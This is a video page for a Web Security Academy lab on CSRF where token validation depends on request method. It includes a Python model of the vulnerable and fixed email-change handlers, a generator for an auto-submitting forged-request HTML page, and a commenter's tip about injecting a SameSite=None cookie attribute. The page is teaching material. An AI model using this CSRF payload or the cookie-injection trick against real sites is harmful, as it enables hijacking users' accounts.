CSRF - Lab #2 CSRF where token validation depends on request method | Short Version

18,930 views

Rana Khalil

1 day ago

In this video, we cover Lab #2 in the CSRF module of the Web Security Academy. This lab's email change functionality is vulnerable to CSRF. It attempts to block CSRF attacks, but only validates its anti-CSRF token for certain request methods, so a request sent with a method that is not checked bypasses the defense. To solve the lab, we craft some HTML that uses a CSRF attack to change the viewer's email address and upload it to our exploit server.
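Added example (not code from the video or from the Web Security Academy lab): a stand-alone Python model of the flaw the description refers to, assuming, as the title implies, that the application validates its anti-CSRF token only when the request is a POST and reads parameters from the query string and body alike. The in-memory session store, handler names, email addresses and lab URL are hypothetical and constructed for this example. It shows the forged cross-site GET being accepted by the method-dependent check, the same GET being refused by a hardened handler that checks the token on every state-changing request and reads it from the body only, and the kind of auto-submitting HTML page the exploit server would host.

```python
import hmac
import secrets
from dataclasses import dataclass, field

# Hypothetical in-memory session store: cookie value -> {"email": ..., "csrf": ...}.
# Assumed for this example; the lab's real backend is not modelled.
SESSIONS = {}


def new_session(email):
    """Log a user in: create a session with its own anti-CSRF token, return the cookie value."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"email": email, "csrf": secrets.token_hex(16)}
    return sid


@dataclass
class Request:
    method: str
    path: str
    cookies: dict = field(default_factory=dict)
    query: dict = field(default_factory=dict)   # URL query-string parameters
    form: dict = field(default_factory=dict)    # POST body parameters


def _session(req):
    return SESSIONS.get(req.cookies.get("session"))


def _token_ok(supplied, expected):
    # Constant-time comparison on bytes so a non-ASCII token cannot raise.
    return hmac.compare_digest(supplied.encode(), expected.encode())


def change_email_vulnerable(req):
    """Method-dependent token validation (the flaw modelled here): the token is
    checked only for POST, and parameters are merged from query string and body,
    so a GET carrying ?email=... with the victim's cookie goes straight through."""
    sess = _session(req)
    if sess is None:
        return 401, "not logged in"
    if req.path != "/my-account/change-email":
        return 404, "not found"
    params = {**req.query, **req.form}
    if req.method == "POST":
        if not _token_ok(params.get("csrf", ""), sess["csrf"]):
            return 400, "invalid CSRF token"
    elif req.method != "GET":
        return 405, "method not allowed"
    if "email" not in params:
        return 400, "missing email"
    sess["email"] = params["email"]
    return 200, "email changed"


def change_email_hardened(req):
    """Fixed handler: state changes only on POST, the token is always checked,
    and both token and email are read from the body only, never the query string."""
    sess = _session(req)
    if sess is None:
        return 401, "not logged in"
    if req.path != "/my-account/change-email":
        return 404, "not found"
    if req.method != "POST":
        return 405, "method not allowed"
    if not _token_ok(req.form.get("csrf", ""), sess["csrf"]):
        return 400, "invalid CSRF token"
    if "email" not in req.form:
        return 400, "missing email"
    sess["email"] = req.form["email"]
    return 200, "email changed"


def forged_get(victim_cookie, new_email):
    """What the attacker's page makes the victim's browser send: a top-level GET
    with the victim's session cookie attached automatically and no CSRF token."""
    return Request("GET", "/my-account/change-email",
                   cookies={"session": victim_cookie}, query={"email": new_email})


def exploit_page(lab_url, new_email):
    """HTML to host on the exploit server: a GET form auto-submitted on load.
    lab_url is a placeholder; substitute the real lab host when using it."""
    return (
        "<html><body>\n"
        f'<form method="GET" action="{lab_url}/my-account/change-email">\n'
        f'  <input type="hidden" name="email" value="{new_email}">\n'
        "</form>\n"
        "<script>document.forms[0].submit();</script>\n"
        "</body></html>\n"
    )


if __name__ == "__main__":
    victim = new_session("victim@example.com")   # constructed sample user
    print(change_email_vulnerable(forged_get(victim, "attacker@example.net")), SESSIONS[victim]["email"])
    victim = new_session("victim@example.com")
    print(change_email_hardened(forged_get(victim, "attacker@example.net")), SESSIONS[victim]["email"])
    print(exploit_page("https://lab.example", "attacker@example.net"))
```

The forged request carries no token at all; the vulnerable handler never looks for one because the method is GET, while the hardened handler refuses any non-POST before it even reaches the email change. The merged `params` dict in the vulnerable handler is the second, quieter hazard: even a POST can be fed its `csrf` or `email` value through the query string, which is why the fixed version reads only from the body.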
▬ ✨ Support Me ✨ ▬▬▬▬▬▬▬▬▬▬
Buy my course: academy.ranakhalil.com/p/web-...
▬ 🔗 Links 🔗 ▬▬▬▬▬▬▬▬▬▬
CSRF Lab #2 long video: • CSRF - Lab #2 CSRF whe...
Notes.txt document: github.com/rkhal101/Web-Secur...
CSRF Lab #1 (previous video): • CSRF - Lab #1 CSRF vul...
CSRF theory video: • Cross-Site Request For...
Web Security Academy KZfaq Video Series Release Schedule: docs.google.com/spreadsheets/...
Web Security Academy: portswigger.net/web-security/...
Rana's Twitter account: / rana__khalil

Comments: 18
@RanaKhalil101 2 years ago
Interested in supporting me and gaining early access to the Web Security Academy videos when they're recorded? Consider buying my course: academy.ranakhalil.com/p/web-security-academy-video-series! ✨ ✨
@frolicfox5432 2 years ago
First things first!! Hats off, Mrs. Rana Khalil, for this swashbuckling video series!! Your elucidation of this concept is amazing, which made my brain store it so easily! Can't wait for your other lectures on various PortSwigger labs, as I am madly waiting for the clickjacking series!! This channel is definitely the next big thing and truly a pentester's delight!! May Allah serve you the best always and bless you! Happy if I receive a reply from you, madam!
@user-ni7rd7st8z 1 year ago
Thanks. I will follow your course.
@brucebane7401 2 years ago
Amazing!!!!!
@_____pd____5919 2 years ago
🔥🔥🔥
@user-ni7rd7st8z 1 year ago
Thanks.
@S2eedGH 1 year ago
Thanks a lot. Can you please explain more about the third condition (no unpredictable request parameters) at 03:34?
@deadeye821 2 years ago
Which cookie editor do you use, and how do you install it?
@saikrishnapuli6591 2 years ago
Without deleting the CSRF token in the POST method, I changed the mail ID and it worked.
@rafinrahmanchy 2 years ago
Use the term "Exploitability" instead of "Analysis". It suits better.
@bishalshrestha3880 2 years ago
First 😳
@etc.4792 1 year ago
I followed all of your process, but my lab is not solving and did not congratulate me. Please give me a solution.
@heyybigdaddy6988 1 month ago
Did it work for you?
@naveenrawat1549 1 month ago
First store, then view, and then deliver.
@heyybigdaddy6988 29 days ago
@naveenrawat1549 Nah. It was due to Lax being implemented in all the browsers. This video is old and doesn't tell you to add %3b%20SAMESITE=NONE after your CSRF key.
@naveenrawat1549 29 days ago
@heyybigdaddy6988 Ohh, I got it, but have you done the same-session CSRF key? I got stuck there.
@naveenrawat1549 22 days ago
@heyybigdaddy6988 Brother, help me: how do I put this? Is it just after the CSRF key or somewhere else? I mean, if csrf=abcd12, then where do I put this?
@thesecuritypoint 2 years ago
Second